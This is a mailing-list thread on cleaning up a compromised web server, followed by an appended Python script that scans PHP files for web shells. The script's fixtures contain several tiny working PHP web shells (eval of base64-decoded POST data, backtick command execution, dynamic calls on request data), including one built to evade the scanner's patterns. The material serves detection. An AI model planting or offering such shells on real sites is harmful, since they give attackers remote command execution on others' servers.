On 08/04/07, Josh Zlatin-Amishav <[EMAIL PROTECTED]> wrote:
> On Sun, 8 Apr 2007, ik wrote:
> > I suggest that you scan for all open ports on your web site
> > (the whole port range), to see if that person has an open "shell" on
> > your account.
>
> Good advice, though the (possible) open shell might just be running on
> port 80/443 (i.e. a PHP shell), which is already open and behind a firewall.
IMHO, if at all possible he should wipe the entire disk and re-install the system (including the boot record and stuff "outside the filesystem address range"). Short of that he will always be worried that there is yet another present left behind by the cracker.

I've been through such a situation many years ago, with a very low budget, so everything was hosted on the same box and the managers were too cheap to buy a separate firewall machine. We kept being cracked by a script kiddie and I didn't know where to start patching the holes he exploited (and probably new ones he opened for himself). Without being able to re-install the system he just kept coming in despite all the cleanups.

These days it's a matter of how much? $300 and a day's work to put up an extra temporary server while you re-install the main one? Most desktops are strong enough to host web sites, so you might not even have to buy dedicated server hardware.

--Amos
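Added example, not part of the thread above: Josh's point is that a PHP shell answers on port 80/443, so the full-range port scan ik suggests will not show it. The complement is to sweep the web root's PHP files for the constructs web shells are built from (request data fed to eval() or a command-execution function, eval() of a decoded blob, dynamic calls on request data). The file names and contents below are constructed samples; the indicator list is a heuristic of my own choosing, not a complete detector, and the last sample is written to slip past it on purpose, which is the practical reason behind Amos's advice to re-install rather than trust a cleanup.

```python
"""Heuristic sweep of a web root for PHP web shells (added example; samples constructed)."""
import os
import re
import tempfile

# Source-level indicators typical of PHP web shells: code execution fed straight
# from request data, eval() of decoded blobs, and dynamic calls on request data.
# This is a heuristic: legitimate code can trigger it and real shells can evade it.
REQ = r"\$_(GET|POST|REQUEST|COOKIE)"
INDICATORS = {
    "eval_of_request": re.compile(r"\beval\s*\(\s*[^)]*" + REQ, re.I),
    "exec_of_request": re.compile(
        r"\b(system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*[^)]*" + REQ, re.I),
    "backtick_exec": re.compile(r"`[^`]*" + REQ + r"[^`]*`", re.I),
    "obfuscated_eval": re.compile(
        r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "dynamic_call_of_request": re.compile(REQ + r"\s*\[[^\]]*\]\s*\(", re.I),
}

PHP_EXTENSIONS = (".php", ".phtml", ".php5", ".inc")


def scan_php_source(src):
    """Return the sorted names of indicators that match one PHP source string."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(src))


def scan_tree(root):
    """Walk a web root; return {relative_path: [indicators]} for suspicious files."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_php_source(fh.read())
            except OSError:
                continue  # unreadable file: skipped here, a real sweep should log it
            if found:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                hits[rel] = found
    return hits


# Constructed sample web root (not real site content): one benign page, three
# shells of different styles, and one shell written to dodge these patterns.
SAMPLE_FILES = {
    "index.php": "<?php\necho 'Hello, ' . htmlspecialchars($_GET['name'] ?? 'world');\n",
    "images/.cache.php": "<?php\n@eval(base64_decode($_POST['c']));\n",
    "uploads/thumb.php": "<?php\nif (isset($_GET['cmd'])) { echo `{$_GET['cmd']}`; }\n",
    "wp-content/x.php": "<?php\n$_GET['f']($_GET['a']);\n",
    "lib/helper.php": "<?php\n$f = $_REQUEST['f'];\n$f($_REQUEST['a']);\n",
}


def write_sample_root(root):
    """Materialise SAMPLE_FILES under root so scan_tree() has something to walk."""
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)


def demo():
    """Scan the constructed web root and return the hits."""
    with tempfile.TemporaryDirectory() as root:
        write_sample_root(root)
        return scan_tree(root)


if __name__ == "__main__":
    for path, indicators in sorted(demo().items()):
        print(f"{path}: {', '.join(indicators)}")
```

Run it against a copy of the real web root (scan_tree(path) rather than demo()) and review every hit by hand; hits in upload or image directories and dot-files are the first to look at. lib/helper.php in the sample set is the caveat: it stages the function name in a variable and so matches none of the patterns, which is exactly why a sweep like this can shorten the list of suspects but cannot certify a box clean.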